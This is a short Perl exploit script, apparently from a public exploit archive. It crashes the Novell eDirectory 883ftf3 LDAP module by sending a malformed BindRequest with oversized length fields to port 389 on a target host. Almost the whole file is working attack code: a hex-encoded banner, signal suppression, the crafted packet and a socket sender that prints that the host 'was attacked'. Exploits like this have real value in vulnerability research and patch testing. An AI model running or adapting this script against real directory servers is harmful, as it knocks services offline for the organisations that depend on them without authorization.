#!/usr/bin/perl

# Novell eDirectory 883ftf3 nldap module DoS.
# Bug found by Matteo Memelli - offensive-security.com
#
# Coded by Oscar Marques aka F-117.
# www.dunkelheit.com.br
# 16/11/09.

my $VERSAO = '0.1';

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';

sub banner {
print ("\x4e\x6f\x76\x65\x6c\x6c\x20\x65\x44\x69\x72\x65\x63\x74\x6f\x72\x79\x20\x38\x38\x33\x66\x74\x66\x33\x20\x6e\x6c\x64\x61\x70\x20\x6d\x6f\x64\x75\x6c\x65\x20\x44\x4f\x53\x2e\n\x43\x6f\x64\x65\x64\x20\x62\x79\x20\x46\x2d\x31\x31\x37\x2e\n\n");
}

banner();

# Change this!
$hostname = "127.0.0.1";

$buffer="\x30\x7E\x02\x02\x01\x60\x77\x02\x84\xFF\xFF\xFF\xFF\x03\x04\x84".
"\xFF\xFF\xFF\xFF\x64\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61".
"\x63\x72\x61\x73\x68\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D".
"\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61\x63\x72\x61\x73\x68\x2C\x64".
"\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e".
"\x6e\x61\x63\x72\x61\x73\x68\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64".
"\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61\x63\x72\x61\x73\x68".
"\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D\x63\x6F\x6D\x80\x00";

use IO::Socket;
my $sock = new IO::Socket::INET (
PeerAddr => $hostname,
PeerPort => '389',
Proto => 'tcp',
);
die "[x] Error: $!\n" unless $sock;
print $sock $buffer;
print ("[+] $hostname was attacked...\n\n");
close($sock);